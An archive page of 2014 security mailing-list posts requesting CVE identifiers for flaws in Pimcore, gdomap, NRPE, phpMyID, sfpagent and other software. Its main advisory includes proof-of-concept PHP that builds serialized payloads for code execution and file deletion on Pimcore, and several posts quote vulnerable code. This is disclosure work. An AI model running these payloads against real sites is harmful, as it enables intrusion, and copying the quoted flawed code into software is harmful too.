Pedro Ribeiro | 19 Apr 12:54 2014

CVE request: Fwd: Remote code execution in Pimcore CMS

Resending this as it hasn't been picked up most likely because of the lack of "CVE request" in the subject line.


---------- Forwarded message ----------
From: "Pedro Ribeiro" <>
Date: 14 Apr 2014 10:16
Subject: Remote code execution in Pimcore CMS
To: <>
Cc: "Bernhard Rusch" <>


I have discovered a PHP object injection in Pimcore CMS.

Depending on the PHP version under which Pimcore is running, it is possible to achieve remote code execution in the worst case, and arbitrary file deletion at best.

Please find attached the report, which is also available at

Can you please provide a CVE number for this?

Thanks in advance.


> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib <at> of Agile Information Security

Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-HERE)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)

This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the
newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve
remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from
[3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all
PHP versions.

Versions affected:
1.4.9 to 1.4.10 (inclusive): Remote code execution (when server is running PHP <= 5.3.3). 
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.

Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on
Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might
be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not
possible, but the requirement was only enforced in 2.0.1.
Note that however the underlying vulnerability for both the remote code execution and the arbitrary file
deletion is the same (unserialize() object injection), so it might be possible to execute code if any
other Zend PHP POP chains are found in the future.

Fix for vulnerability:

Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):

PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):

Code snippets:


    public function getObjectByToken($token) {
        $data = unserialize(base64_decode($token));
        if($data) {
            if($object = Object_Abstract::getById($data["id"])) {

                if($version = $object->getLatestVersion()) {
                    $object = $version->getData();

This function is called in the same file in confirm() and unsubscribeByToken():
    public function confirm($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

    public function unsubscribeByToken ($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you
to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
    public function confirmAction() {


        $this->view->success = false;

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used
for your class above (mailing list)

        if($newsletter->confirm($this->getParam("token"))) {
            $this->view->success = true;

And also in unsubscribeAction():
    public function unsubscribeAction() {


        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used
for your class above (mailing list)

        $unsubscribeMethod = null;
        $success = false;

        if($this->getParam("email")) {
            $unsubscribeMethod = "email";
            $success = $newsletter->unsubscribeByEmail($this->getParam("email"));

        if($this->getParam("token")) {
            $unsubscribeMethod = "token";
            $success = $newsletter->unsubscribeByToken($this->getParam("token"));

Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of
unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.

[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)

class Zend_Search_Lucene_Index_FieldInfo
    public $name = '<?php phpinfo(); die;?>';

class Zend_Search_Lucene_Storage_Directory_Filesystem
    protected $_dirPath = null;

    public function __construct($path)
        $this->_dirPath = $path;

interface Zend_Pdf_ElementFactory_Interface {}

class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;

    public function __construct($directory, $fields)
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;

class Zend_Pdf_ElementFactory_Proxy
    private $_factory;

    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
        $this->_factory = $factory;

// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);

echo base64_encode(serialize($____proxy));


[4] Arbitrary file deletion, all PHP versions
class Zend_Http_Response_Stream 
    protected $stream;
    protected $stream_name;
    protected $_cleanup;
    public function setStream($stream)
        $this->stream = $stream;
        return $this;
    public function setCleanup($cleanup = true) {
        $this->_cleanup = $cleanup;
    public function setStreamName($stream_name) {
        $this->stream_name = $stream_name;
        return $this;
$resp = new Zend_Http_Response_Stream();

echo base64_encode(serialize($resp));

[6] Downloadable from the Pimcore website (
The file mentioned is website/controllers/NewsletterController.php.

Other references:
Matthew Daley | 19 Apr 02:51 2014

CVE request / advisory: gdomap (GNUstep core package <= 1.24.6)


I'd like to request a CVE ID for this issue. It was found in software
from GNUstep (, which develop an open-source
development framework and runtime for client and server applications.

This is the first such request and the issue is (now) public; this
message serves as an advisory as well.

Affected software: gdomap (GNUstep Distributed Objects nameserver)
Description: After receiving a crafted invalid request, gdomap will
attempt to log an error message to the system logger. However, due to
incorrect setup of the logger during server initialization, the logger
and gdomap itself will mess up program state enough that program
execution will be aborted. gdomap listens to all interfaces, allowing
a remote unauthenticated attacker to DOS the nameserver. (Please see
the bug tracker entry for more detailed information.)
Bug tracker:
Affected versions: current releases (GNUstep core package <= 1.24.6)
Release notes:
Reported by: Matthew Daley

Please let me know if you need any further information.


- Matthew Daley

Forest Monsen | 18 Apr 19:40 2014

CVE Request for Drupal Core

Hi there,

Please issue a CVE identifier for:

SA-CORE-2014-002 - Drupal core - Information Disclosure


Eduardo Tongson | 18 Apr 04:14 2014

CVE Request: Nagios Remote Plugin Executor <= 2.15 Remote Command Execution

This is similar to CVE-2013-1362

Is there a CVE already assigned for this issue?


--- nrpe/src/nrpe.c
+++ nrpe/src/nrpe.c
 <at>  <at>  -42,7 +42,7  <at>  <at>  int use_ssl=FALSE;

 #define DEFAULT_COMMAND_TIMEOUT    60            /* default timeout
for execution of plugins */
 #define MAXFD                   64
-#define NASTY_METACHARS         "|`&><'\"\\[]{};"
+#define NASTY_METACHARS         "|`&><'\"\\[]{};\n"

 char    *command_name=NULL;
 char    *macro_argv[MAX_COMMAND_ARGUMENTS];

Raphael Geissert | 17 Apr 14:13 2014

CVE ids for CyaSSL 2.9.4?


[CC'ing Ivan Fratric and one of the many  <at> wolfssl addresses I found]

CyaSSL 2.9.4 fixes a number of security issues.

From [3]:
> Issue #1 (Memory  Corruption)
> Issue #2 (Out of bounds read)
> Issue #3 (Dangerous Default Behavior, out of bounds read)
> Issue #4 (NULL pointer dereference)
> Issue #5 (Unknown Critical Certificate Extension Allowed)

Have CVE ids been assigned already? if not, could they be assigned?

Thanks in advance.



Raphael Geissert - Debian Developer -

Marc Deslauriers | 17 Apr 13:39 2014

CVE Request: systemd stack-based buffer overflow in systemd-ask-password


From the Red Hat bug:
A stack-based buffer overflow was found in systemd-ask-password, a utility used
to query a system password or passphrase from the user, using a question message
specified on the command line. A local user could this flaw to crash the binary
or even execute arbitrary code with the permissions of the user running the program.

Bug report:


Could a CVE please be assigned to this issue?




Marc Deslauriers
Ubuntu Security Engineer     |
Canonical Ltd.               |

Adam Caudill | 17 Apr 07:25 2014

CVE Request - XXS in phpMyID (openid_error)

There is a XXS vulnerability in phpMyID v0.9, in the openid_error parameter. The value passed into
openid_error is passed through to the output without modification when openid.mode is “error”.


Here is the code at fault:

MyID.php Line 569:
  function error_mode () {
  		? wrap_html($_REQUEST['openid_error'])
  		: error_500();

MyID.php Line 1559:
  function wrap_html ( $message ) {
  	global $charset, $profile;

  	header('Content-Type: text/html; charset=' . $charset);
  	echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
  <link rel="openid.server" href="' . $profile['req_url'] . '" />
  <link rel="openid.delegate" href="' . $profile['idp_url'] . '" />
  ' . implode("\n", $profile['opt_headers']) . '
  <meta name="charset" content="' . $charset . '" />
  <meta name="robots" content="noindex,nofollow" />
  <p>' . $message . '</p>


Project Page:

The author has stated that the project is no longer maintained, so hasn’t been notified, and thus there is
no fixed version. This is being submitted to raise awareness among those that use this application, and in
hopes that a new maintainer will take the project over and address the outstanding issues.


Adam Caudill

Raphael Geissert | 16 Apr 22:10 2014

CVE request: openssl: missing critical flag for extended key usage not always detected in time-stamp verification


Quoting from [0]:
> "check_purpose_timestamp_sign()" in source file v3_purp.c [...] fails to
> detect a missing critical flag if the extensions of the TSA certificate
> are arranged in a specific order.

Could a CVE id be assigned for this?

The referenced commit fixes it "and to two other cases in the same file."


Digging through history, the bug on TSA was introduced in 
(Strangely tagged for 0.9.8l and 0.9.8k but none of the other versions of 
the 0.9.8 branch)

And the two others in:
(going all the way back to 0.9.7)

Haven't checked if the meaning of the X509_get_ext_by_NID parameter changed 
at some point.


Raphael Geissert - Debian Developer -

Źmicier Januszkiewicz | 16 Apr 13:36 2014

libmms heap-based buffer overflow fix

Hello list,

It seems libmms has fixed a buffer overflow in a recent 0.6.4 version
with the following commit.

This may be triggered via an overly long line of a MMSH (MMS over
HTTP) server response, effectively overflowing the buffer which has a
static size (defined as BUF_SIZE, didn't check the actual numeric

Please assign a CVE name for this, if there is none.

Kind regards,

Murray McAllister | 16 Apr 06:26 2014

CVE request: insecure temporary file handling in clang's scan-build utility


Jakub Wilk discovered that clang's scan-build utility insecurely handled 
temporary files. Full details in his report:

Can a CVE please be assigned?


Murray McAllister / Red Hat Security Response Team

Larry W. Cashdollar | 16 Apr 02:02 2014

Remote Command Injection in Ruby Gem sfpagent 0.4.14

Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14

Date: 4/15/2014

Author: Larry W. Cashdollar,  <at> _larry0

CVE: Please assign one at your leisure. 


The list variable generated from the user supplied JSON[body] input is passed directly to the system()
shell on line 649. If a user supplies a module name with shell metacharacters like ; they might be able to
execute shell commands on the remote system as the sfpagent running user id.
I think to fix this youâ€TMd need to sanitize all input from the user with shellwords.escape.

637                         code, body = get_data(address, port, '/modules')
638                         raise Exception, "Unable to get modules list from {name}" if code.to_i != 200
640                         modules = JSON[body]
641                         list = ''
642                         schemata.each { |m|
643                                 list += "{m} " if File.exist?("{modules_dir}/{m}") and
644                                                    (not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645                         }
647                         return true if list == ''
649                         if system("cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650                        "Push modules #{list}to #{name} [OK]"
651                         else
652                                 Sfp::Agent.logger.warn "Push modules #{list}to #{name} [Failed]"
653                         end
655                         return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.